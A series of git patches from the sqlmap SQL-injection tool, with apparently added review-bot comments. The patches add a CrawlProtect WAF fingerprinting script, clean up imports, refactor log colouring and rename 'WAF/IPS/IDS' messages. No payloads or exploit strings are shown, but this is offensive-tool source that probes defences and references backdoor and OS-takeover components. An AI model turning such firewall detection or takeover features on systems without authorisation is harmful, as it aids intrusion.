@@ -0,0 +1,19 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from lib.core.settings import WAF_ATTACK_VECTORS + +__product__ = "CrawlProtect (Jean-Denis Brun)" + +def detect(get_page): + retval = False + + for vector in WAF_ATTACK_VECTORS: + page, _, code = get_page(get=vector) + retval = code >= 400 and "This site is protected by CrawlProtect" in (page or "") + + return retval From a633bc7f32ebdb339717ad627755e932e1c3f387 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 13 Sep 2018 11:41:19 +0200 Subject: [PATCH 280/428] Trivial cleanup --- extra/wafdetectify/wafdetectify.py | 2 -- lib/core/settings.py | 2 +- lib/core/target.py | 1 - lib/request/connect.py | 1 - plugins/generic/takeover.py | 3 +-- txt/checksum.md5 | 20 ++++++++++---------- waf/aesecure.py | 3 --- waf/cloudfront.py | 1 - waf/distil.py | 3 --- waf/varnish.py | 1 - 10 files changed, 12 insertions(+), 25 deletions(-) diff --git a/extra/wafdetectify/wafdetectify.py b/extra/wafdetectify/wafdetectify.py index 248a009e77d..f75c9f0a844 100644 --- a/extra/wafdetectify/wafdetectify.py +++ b/extra/wafdetectify/wafdetectify.py @@ -13,9 +13,7 @@ import re import subprocess import sys -import urllib import urllib2 -import urlparse sys.dont_write_bytecode = True diff --git a/lib/core/settings.py b/lib/core/settings.py index 87472e89d0c..7c91cb454cd 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.19" +VERSION = "1.2.9.20" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/target.py b/lib/core/target.py index 4691cec83e9..4653cb6b027 100644 
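Review bot: In `detect`, `retval` is reassigned on every iteration of `for vector in WAF_ATTACK_VECTORS:` and the loop never exits early, so a positive match on an earlier vector is overwritten by a later vector that does not trigger the block page and only the last vector's result is returned. Mirror waf/aesecure.py from the same commit and add `if retval: break` after the assignment (or accumulate with `retval |= ...`).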
--- a/lib/core/target.py +++ b/lib/core/target.py @@ -5,7 +5,6 @@ See the file 'LICENSE' for copying permission """ -import codecs import functools import os import re diff --git a/lib/request/connect.py b/lib/request/connect.py index 0c24e576517..711a76effbe 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -85,7 +85,6 @@ class WebSocketException(Exception): from lib.core.exception import SqlmapValueException from lib.core.settings import ASTERISK_MARKER from lib.core.settings import BOUNDARY_BACKSLASH_MARKER -from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR from lib.core.settings import DEFAULT_CONTENT_TYPE from lib.core.settings import DEFAULT_COOKIE_DELIMITER from lib.core.settings import DEFAULT_GET_POST_DELIMITER diff --git a/plugins/generic/takeover.py b/plugins/generic/takeover.py index e53eeedd1d9..88a261040fa 100644 --- a/plugins/generic/takeover.py +++ b/plugins/generic/takeover.py @@ -125,8 +125,7 @@ def osPwn(self): raise SqlmapMissingPrivileges(errMsg) try: - from impacket import ImpactDecoder - from impacket import ImpactPacket + __import__("impacket") except ImportError: errMsg = "sqlmap requires 'python-impacket' third-party library " errMsg += "in order to run icmpsh master. You can get it at " diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 9b1307fc7cb..a8f816ad911 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -22,7 +22,7 @@ e4805169a081b834ca51a60a150c7247 extra/shutils/newlines.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py -0142de525def5e3f17092dcc1ed67c95 extra/wafdetectify/wafdetectify.py +1c7e6968f71214f8a0355420f3914f27 extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py 2058987606ad75435c69d28cab11ef9e lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py 
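Review bot: In plugins/generic/takeover.py, `__import__("impacket")` only verifies that the top-level package is importable, whereas the removed lines also confirmed that the `ImpactDecoder` and `ImpactPacket` modules are present, so a partial or incompatible impacket install now passes this check and presumably fails later with a less helpful traceback instead of the 'python-impacket' message. If the aim is only to avoid unused-name warnings, `__import__("impacket.ImpactDecoder")` and `__import__("impacket.ImpactPacket")` keep the same coverage. osPwn continues outside the hunk.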
@@ -50,10 +50,10 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -ef7c758b79feb71ddb3376df9149d562 lib/core/settings.py +03a73c87322c0165d98bcc1df2794e9f lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py -815d1cf27f0f8738d81531e73149867d lib/core/target.py +248bd121e0565318e1efaff54aa427bc lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py e896992e4db26605ab1e73615b1f9434 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py @@ -72,7 +72,7 @@ f2af274126ce0a789027d35d367f2b9e lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -cb148ee9778fdd61bdfc6b524aa1b3a2 lib/request/connect.py +84f9cb02454fa21a619ccd2b3fd294d4 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py @@ -216,7 +216,7 @@ f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py f7874230e5661910d5fd21544c7d1022 plugins/generic/misc.py b1d2a7f3170f9b69e71335aa47f9b08b plugins/generic/search.py a70cc0ada4b0cc9e7df23cb6d48a4a0c plugins/generic/syntax.py -4adc07051b727f1525cf0a2d619221f8 plugins/generic/takeover.py +a37c21cc3fa5c0c220d33d450bf503ed plugins/generic/takeover.py 4419b13a4b78d7e9e4a2632302344a1a plugins/generic/users.py 1e5532ede194ac9c083891c2f02bca93 plugins/__init__.py 5dc693e22f5d020c5c568d7325bd4226 shell/backdoors/backdoor.asp_ 
@@ -286,7 +286,7 @@ cc212839f55692d422beef3a8e22a8d4 tamper/uppercase.py f2b9eac52d346315f5705f71beeda791 tamper/varnish.py 0e40966a51d1eb5d42a2159d2015a8a4 tamper/versionedkeywords.py 0fba004bf1be6edbefbda89f23f4e518 tamper/versionedmorekeywords.py -de532c4e3160039335010c499129d54f tamper/xforwardedfor.py +23d845e9f937f2a31c43767b8a8fcff6 tamper/xforwardedfor.py b422795c5e589decec725963e480ffba thirdparty/ansistrm/ansistrm.py d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py 8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py @@ -392,7 +392,7 @@ d9006810684baf01ea33281d21522519 udf/postgresql/windows/32/8.3/lib_postgresqlud ca3ab78d6ed53b7f2c07ed2530d47efd udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ 0d3fe0293573a4453463a0fa5a081de1 udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ 336d0b0d2be333f5a6184042c85464fd waf/360.py -0ce8a335c7eb9cf14e645f64b3a5e91f waf/aesecure.py +9bf2e07cdc54a661aea056223caccfb6 waf/aesecure.py a73a40d201b39f3387714c59934331e4 waf/airlock.py 7da7970b45512b0233450dbd8088fde0 waf/anquanbao.py b61329e8f8bdbf5625f9520ec010af1f waf/armor.py @@ -406,12 +406,12 @@ ef722d062564def381b1f96f5faadee3 waf/baidu.py 2f3bbf43be94d4e9ffe9f80e8483d62f waf/ciscoacexml.py ba84f296cb52f5e78a0670b98d7763fa waf/cloudbric.py 94b50385a9d462492e3a639d71aaa1c3 waf/cloudflare.py -29ba81741fd7e220a95fe7c5fae76e1a waf/cloudfront.py +a8affab0838c6a1fe683d5b7333d7a69 waf/cloudfront.py ac96f34c254951d301973617064eb1b5 waf/comodo.py c84e515440fe482476c1f2687bd9960f waf/crawlprotect.py 56d58c982c2cf775e0f8dc6767f336fd waf/datapower.py 1538b661e35843074f4599be93b3fae9 waf/denyall.py -0182d23b34cf903537f77f4ec4b144bf waf/distil.py +67256152eef36a85498b49a1f0e4e328 waf/distil.py aade02eb8f6a4a214a53db0fd0f2aae6 waf/dosarrest.py 9760a22990f55ab51ea4eedabd939055 waf/dotdefender.py 7ec3f2a90914b501100685aa66aadf02 waf/edgecast.py 
@@ -451,7 +451,7 @@ dffa9cebad777308714aaf83b71635b4 waf/teros.py b37210459a13de40bf07722c4d032c33 waf/trafficshield.py fe01932df9acea7f6d23f03c6b698646 waf/urlscan.py a687449cd4e45f69e33b13d41e021480 waf/uspses.py -ab329be0231efdd360ebabd24c0e5315 waf/varnish.py +2d2740972d887d099e9cc8f132a8f147 waf/varnish.py 20840afc269920826deac2b6c00d6b9c waf/wallarm.py 11205abf397ae9072adc3234b656ade9 waf/watchguard.py 9bf34539f382987490d2239d8ef0a651 waf/webappsecure.py diff --git a/waf/aesecure.py b/waf/aesecure.py index 083d1aad445..18b87bfaf14 100644 --- a/waf/aesecure.py +++ b/waf/aesecure.py @@ -5,9 +5,6 @@ See the file 'LICENSE' for copying permission """ -import re - -from lib.core.enums import HTTP_HEADER from lib.core.settings import WAF_ATTACK_VECTORS __product__ = "aeSecure (aeSecure)" diff --git a/waf/cloudfront.py b/waf/cloudfront.py index d7ddc807ed4..462f909acf3 100644 --- a/waf/cloudfront.py +++ b/waf/cloudfront.py @@ -7,7 +7,6 @@ import re -from lib.core.enums import HTTP_HEADER from lib.core.settings import WAF_ATTACK_VECTORS __product__ = "CloudFront (Amazon)" diff --git a/waf/distil.py b/waf/distil.py index 25e1908d865..064425dcf5e 100644 --- a/waf/distil.py +++ b/waf/distil.py @@ -5,9 +5,6 @@ See the file 'LICENSE' for copying permission """ -import re - -from lib.core.enums import HTTP_HEADER from lib.core.settings import WAF_ATTACK_VECTORS __product__ = "Distil Web Application Firewall Security (Distil Networks)" diff --git a/waf/varnish.py b/waf/varnish.py index 62965755bdf..8617cd802d7 100644 --- a/waf/varnish.py +++ b/waf/varnish.py @@ -7,7 +7,6 @@ import re -from lib.core.enums import HTTP_HEADER from lib.core.settings import WAF_ATTACK_VECTORS __product__ = "Varnish FireWall (OWASP)" From 71448b1c169314f633e8b422ace127498792f3a7 Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar Date: Fri, 14 Sep 2018 09:45:04 +0200 Subject: [PATCH 281/428] Minor refactoring --- lib/core/settings.py | 2 +- thirdparty/ansistrm/ansistrm.py | 44 ++++++++++++--------------------- txt/checksum.md5 | 4 +-- 3 files changed, 19 insertions(+), 31 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 7c91cb454cd..c6d1307d5e1 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.20" +VERSION = "1.2.9.21" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/thirdparty/ansistrm/ansistrm.py b/thirdparty/ansistrm/ansistrm.py index 24533f249d2..a2af36e2b64 100644 --- a/thirdparty/ansistrm/ansistrm.py +++ b/thirdparty/ansistrm/ansistrm.py @@ -130,6 +130,16 @@ def output_colorized(self, message): ctypes.windll.kernel32.SetConsoleTextAttribute(h, color) + def _reset(self, message): + if not message.endswith(self.reset): + reset = self.reset + elif self.bold in message: # bold + reset = self.reset + self.bold + else: + reset = self.reset + + return reset + def colorize(self, message, levelno): if levelno in self.level_map and self.is_tty: bg, fg, bold = self.level_map[levelno] 
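Review bot: In the new `_reset` helper the first and third branches both assign `self.reset`, so the three-way if/elif/else only distinguishes one case and reads as if it had three; `return self.reset + self.bold if message.endswith(self.reset) and self.bold in message else self.reset` says the same thing in one line. The helper also lacks a docstring, and the contract is not obvious from the name: something like `"""Return the reset sequence to append after a colorized fragment; re-enables bold when the message already ends with a reset and was bold."""` would help the next reader. The `colorize` method that calls it continues past the end of this hunk.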
@@ -162,51 +172,29 @@ def colorize(self, message, levelno): match = re.search(r"\A\s*\[([\d:]+)\]", message) # time if match: time = match.group(1) - if not message.endswith(self.reset): - reset = self.reset - elif self.bold in message: # bold - reset = self.reset + self.bold - else: - reset = self.reset - message = message.replace(time, ''.join((self.csi, str(self.color_map["cyan"] + 30), 'm', time, reset)), 1) + message = message.replace(time, ''.join((self.csi, str(self.color_map["cyan"] + 30), 'm', time, self._reset(message))), 1) match = re.search(r"\[(#\d+)\]", message) # counter if match: counter = match.group(1) - if not message.endswith(self.reset): - reset = self.reset - elif self.bold in message: # bold - reset = self.reset + self.bold - else: - reset = self.reset - message = message.replace(counter, ''.join((self.csi, str(self.color_map["yellow"] + 30), 'm', counter, reset)), 1) + message = message.replace(counter, ''.join((self.csi, str(self.color_map["yellow"] + 30), 'm', counter, self._reset(message))), 1) if level != "PAYLOAD": if any(_ in message for _ in ("parsed DBMS error message",)): string = re.search(r": '(.+)'", message).group(1) - if not message.endswith(self.reset): - reset = self.reset - elif self.bold in message: # bold - reset = self.reset + self.bold - else: - reset = self.reset - message = message.replace("'%s'" % string, "'%s'" % ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, reset)), 1) + message = message.replace("'%s'" % string, "'%s'" % ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, self._reset(message))), 1) else: for match in re.finditer(r"[^\w]'([^']+)'", message): # single-quoted string = match.group(1) - if not message.endswith(self.reset): - reset = self.reset - elif self.bold in message: # bold - reset = self.reset + self.bold - else: - reset = self.reset - message = message.replace("'%s'" % string, "'%s'" % ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, reset)), 
1) + message = message.replace("'%s'" % string, "'%s'" % ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, self._reset(message))), 1) else: message = ''.join((self.csi, ';'.join(params), 'm', message, self.reset)) if prefix: message = "%s%s" % (prefix, message) + message = message.replace("%s]" % self.bold, "]%s" % self.bold) # dirty patch + return message def format(self, record): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a8f816ad911..83c7b7ff198 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -03a73c87322c0165d98bcc1df2794e9f lib/core/settings.py +3698f90905c46eb938cf0b0f5235132f lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 248bd121e0565318e1efaff54aa427bc lib/core/target.py @@ -287,7 +287,7 @@ f2b9eac52d346315f5705f71beeda791 tamper/varnish.py 0e40966a51d1eb5d42a2159d2015a8a4 tamper/versionedkeywords.py 0fba004bf1be6edbefbda89f23f4e518 tamper/versionedmorekeywords.py 23d845e9f937f2a31c43767b8a8fcff6 tamper/xforwardedfor.py -b422795c5e589decec725963e480ffba thirdparty/ansistrm/ansistrm.py +1ebf563bb2cb18b68ea952418bba0ec5 thirdparty/ansistrm/ansistrm.py d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py 8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py cb2e1fe7c404dff41a2ae9132828f532 thirdparty/beautifulsoup/__init__.py From a5e3dce26fc336de42bee06bdf0d34c0386fd6c1 Mon Sep 17 00:00:00 2001 
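Review bot: The newly added `message = message.replace("%s]" % self.bold, "]%s" % self.bold)  # dirty patch` is unconditional and its comment explains neither what artefact it repairs nor why it is safe, which makes it hard to remove later once the replacements above are fixed; from the code it moves a bold escape that landed immediately before a closing `]` to after the bracket, so a comment such as `# the replacements above can leave a bold escape just before a closing ']'; move it after the bracket so the bracket itself is not bolded` would document the intent. If the message is not a TTY message this line still runs, but whether that matters depends on the guard at the top of `colorize`, which starts outside this hunk.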
From: Miroslav Stampar Date: Fri, 14 Sep 2018 10:01:31 +0200 Subject: [PATCH 282/428] Proper naming --- doc/CHANGELOG.md | 8 ++++---- extra/wafdetectify/wafdetectify.py | 2 +- lib/controller/checks.py | 20 ++++++++++---------- lib/core/option.py | 2 +- lib/core/settings.py | 8 ++++---- lib/parse/cmdline.py | 4 ++-- lib/request/connect.py | 6 +++--- txt/checksum.md5 | 12 ++++++------ 8 files changed, 31 insertions(+), 31 deletions(-) diff --git a/doc/CHANGELOG.md b/doc/CHANGELOG.md index 1e3284055da..88bbcf56e19 100644 --- a/doc/CHANGELOG.md +++ b/doc/CHANGELOG.md @@ -3,7 +3,7 @@ * Implemented support for automatic decoding of page content through detected charset. * Implemented mechanism for proper data dumping on DBMSes not supporting `LIMIT/OFFSET` like mechanism(s) (e.g. Microsoft SQL Server, Sybase, etc.). * Major improvements to program stabilization based on user reports. -* Added new tampering scripts avoiding popular WAF/IPS/IDS mechanisms. +* Added new tampering scripts avoiding popular WAF/IPS mechanisms. * Fixed major bug with DNS leaking in Tor mode. * Added wordlist compilation made of the most popular cracking dictionaries. * Implemented multi-processor hash cracking routine(s). @@ -23,7 +23,7 @@ * Added option `--csv-del` for manually setting delimiting character used in CSV output. * Added switch `--hex` for using DBMS hex conversion function(s) for data retrieval. * Added switch `--smart` for conducting through tests only in case of positive heuristic(s). -* Added switch `--check-waf` for checking of existence of WAF/IPS/IDS protection. +* Added switch `--check-waf` for checking of existence of WAF/IPS protection. * Added switch `--schema` to enumerate DBMS schema: shows all columns of all databases' tables. * Added switch `--count` to count the number of entries for a specific table or all database(s) tables. * Major improvements to switches `--tables` and `--columns`. 
@@ -55,7 +55,7 @@ * Added option `--host` to set the HTTP Host header value. * Added switch `--hostname` to turn on retrieval of DBMS server hostname. * Added switch `--hpp` to turn on the usage of HTTP parameter pollution WAF bypass method. -* Added switch `--identify-waf` for turning on the thorough testing of WAF/IPS/IDS protection. +* Added switch `--identify-waf` for turning on the thorough testing of WAF/IPS protection. * Added switch `--ignore-401` to ignore HTTP Error Code 401 (Unauthorized). * Added switch `--invalid-bignum` for usage of big numbers while invalidating values. * Added switch `--invalid-logical` for usage of logical operations while invalidating values. @@ -78,7 +78,7 @@ * Added option `--skip` to skip testing of given parameter(s). * Added switch `--skip-static` to skip testing parameters that not appear to be dynamic. * Added switch `--skip-urlencode` to skip URL encoding of payload data. -* Added switch `--skip-waf` to skip heuristic detection of WAF/IPS/IDS protection. +* Added switch `--skip-waf` to skip heuristic detection of WAF/IPS protection. * Added switch `--smart` to conduct thorough tests only if positive heuristic(s). * Added option `--sql-file` for setting file(s) holding SQL statements to be executed (in case of stacked SQLi). * Added switch `--sqlmap-shell` to turn on interactive sqlmap shell prompt. diff --git a/extra/wafdetectify/wafdetectify.py b/extra/wafdetectify/wafdetectify.py index f75c9f0a844..68cdcb93bdf 100644 --- a/extra/wafdetectify/wafdetectify.py +++ b/extra/wafdetectify/wafdetectify.py @@ -107,7 +107,7 @@ def main(): continue if function(get_page): - print colorize("[!] WAF/IPS/IDS identified as '%s'" % product) + print colorize("[!] WAF/IPS identified as '%s'" % product) found = True if not found: diff --git a/lib/controller/checks.py b/lib/controller/checks.py index cff287cdaf5..56351fd8c3d 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py 
@@ -896,7 +896,7 @@ def _(): kb.injection = injection - for i in xrange(conf.level): + for level in xrange(conf.level): while True: randInt1, randInt2, randInt3 = (_() for j in xrange(3)) @@ -1338,7 +1338,7 @@ def checkWaf(): if _ is not None: if _: warnMsg = "previous heuristics detected that the target " - warnMsg += "is protected by some kind of WAF/IPS/IDS" + warnMsg += "is protected by some kind of WAF/IPS" logger.critical(warnMsg) return _ @@ -1346,7 +1346,7 @@ def checkWaf(): return None infoMsg = "checking if the target is protected by " - infoMsg += "some kind of WAF/IPS/IDS" + infoMsg += "some kind of WAF/IPS" logger.info(infoMsg) retVal = False @@ -1378,12 +1378,12 @@ def checkWaf(): if retVal: warnMsg = "heuristics detected that the target " - warnMsg += "is protected by some kind of WAF/IPS/IDS" + warnMsg += "is protected by some kind of WAF/IPS" logger.critical(warnMsg) if not conf.identifyWaf: message = "do you want sqlmap to try to detect backend " - message += "WAF/IPS/IDS? [y/N] " + message += "WAF/IPS? [y/N] " if readInput(message, default='N', boolean=True): conf.identifyWaf = True @@ -1407,7 +1407,7 @@ def identifyWaf(): kb.testMode = True infoMsg = "using WAF scripts to detect " - infoMsg += "backend WAF/IPS/IDS protection" + infoMsg += "backend WAF/IPS protection" logger.info(infoMsg) @cachedmethod @@ -1434,7 +1434,7 @@ def _(*args, **kwargs): continue try: - logger.debug("checking for WAF/IPS/IDS product '%s'" % product) + logger.debug("checking for WAF/IPS product '%s'" % product) found = function(_) except Exception, ex: errMsg = "exception occurred while running " @@ -1444,7 +1444,7 @@ def _(*args, **kwargs): found = False if found: - errMsg = "WAF/IPS/IDS identified as '%s'" % product + errMsg = "WAF/IPS identified as '%s'" % product logger.critical(errMsg) retVal.append(product) 
@@ -1456,7 +1456,7 @@ def _(*args, **kwargs): with openFile(filename, "w+b") as f: f.write(kb.wafSpecificResponse) - message = "WAF/IPS/IDS specific response can be found in '%s'. " % filename + message = "WAF/IPS specific response can be found in '%s'. " % filename message += "If you know the details on used protection please " message += "report it along with specific response " message += "to '%s'" % DEV_EMAIL_ADDRESS @@ -1473,7 +1473,7 @@ def _(*args, **kwargs): if not choice: raise SqlmapUserQuitException else: - warnMsg = "WAF/IPS/IDS product hasn't been identified" + warnMsg = "WAF/IPS product hasn't been identified" logger.warn(warnMsg) kb.testType = None diff --git a/lib/core/option.py b/lib/core/option.py index 3241edf9ebb..5bd75098740 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -824,7 +824,7 @@ def _setTamperingFunctions(): def _setWafFunctions(): """ - Loads WAF/IPS/IDS detecting functions from script(s) + Loads WAF/IPS detecting functions from script(s) """ if conf.identifyWaf: diff --git a/lib/core/settings.py b/lib/core/settings.py index c6d1307d5e1..6a133d608e9 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.21" +VERSION = "1.2.9.22" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
@@ -45,10 +45,10 @@ DIFF_TOLERANCE = 0.05 CONSTANT_RATIO = 0.9 -# Ratio used in heuristic check for WAF/IPS/IDS protected targets +# Ratio used in heuristic check for WAF/IPS protected targets IDS_WAF_CHECK_RATIO = 0.5 -# Timeout used in heuristic check for WAF/IPS/IDS protected targets +# Timeout used in heuristic check for WAF/IPS protected targets IDS_WAF_CHECK_TIMEOUT = 10 # Lower and upper values for match ratio in case of stable page @@ -531,7 +531,7 @@ # Value to look for in response to CHECK_INTERNET_ADDRESS CHECK_INTERNET_VALUE = "IP Address Details" -# Vectors used for provoking specific WAF/IPS/IDS behavior(s) +# Vectors used for provoking specific WAF/IPS behavior(s) WAF_ATTACK_VECTORS = ( "", # NIL "search=", diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 24dfa7d6b59..4570b9996f1 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -635,7 +635,7 @@ def cmdLineParser(argv=None): help="Use Google dork results from specified page number") miscellaneous.add_option("--identify-waf", dest="identifyWaf", action="store_true", - help="Make a thorough testing for a WAF/IPS/IDS protection") + help="Make a thorough testing for a WAF/IPS protection") miscellaneous.add_option("--list-tampers", dest="listTampers", action="store_true", help="Display list of available tamper scripts") @@ -650,7 +650,7 @@ def cmdLineParser(argv=None): help="Safely remove all content from sqlmap data directory") miscellaneous.add_option("--skip-waf", dest="skipWaf", action="store_true", - help="Skip heuristic detection of WAF/IPS/IDS protection") + help="Skip heuristic detection of WAF/IPS protection") miscellaneous.add_option("--smart", dest="smart", action="store_true", help="Conduct thorough tests only if positive heuristic(s)") diff --git a/lib/request/connect.py b/lib/request/connect.py index 711a76effbe..d114663b7c1 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py 
@@ -649,7 +649,7 @@ class _(dict): warnMsg = "connection was forcibly closed by the target URL" elif "timed out" in tbMsg: if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED): - singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS/IDS) is dropping 'suspicious' requests") + singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS) is dropping 'suspicious' requests") kb.droppingRequests = True warnMsg = "connection timed out to the target URL" elif "Connection reset" in tbMsg: @@ -658,7 +658,7 @@ class _(dict): conf.disablePrecon = True if kb.testMode: - singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS/IDS) is resetting 'suspicious' requests") + singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS) is resetting 'suspicious' requests") kb.droppingRequests = True warnMsg = "connection reset to the target URL" elif "URLError" in tbMsg or "error" in tbMsg: @@ -1235,7 +1235,7 @@ def _randomizeParameter(paramString, randomParameter): warnMsg = "site returned insanely large response" if kb.testMode: warnMsg += " in testing phase. This is a common " - warnMsg += "behavior in custom WAF/IPS/IDS solutions" + warnMsg += "behavior in custom WAF/IPS solutions" singleTimeWarnMessage(warnMsg) if conf.secondUrl: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 83c7b7ff198..7cdd4e99d57 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -22,9 +22,9 @@ e4805169a081b834ca51a60a150c7247 extra/shutils/newlines.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py -1c7e6968f71214f8a0355420f3914f27 extra/wafdetectify/wafdetectify.py +c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py -2058987606ad75435c69d28cab11ef9e lib/controller/checks.py +0d4c9c5936d0c063f4b08318f26ad5ca lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -43,14 +43,14 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py -62fb1b8e7a82c726eb9631daac4c82e9 lib/core/option.py +c59c0bfccf3e906564d82adf1fcd17de lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -3698f90905c46eb938cf0b0f5235132f lib/core/settings.py +1778dd902fbe5392377fd9b723898bbb lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 248bd121e0565318e1efaff54aa427bc lib/core/target.py 
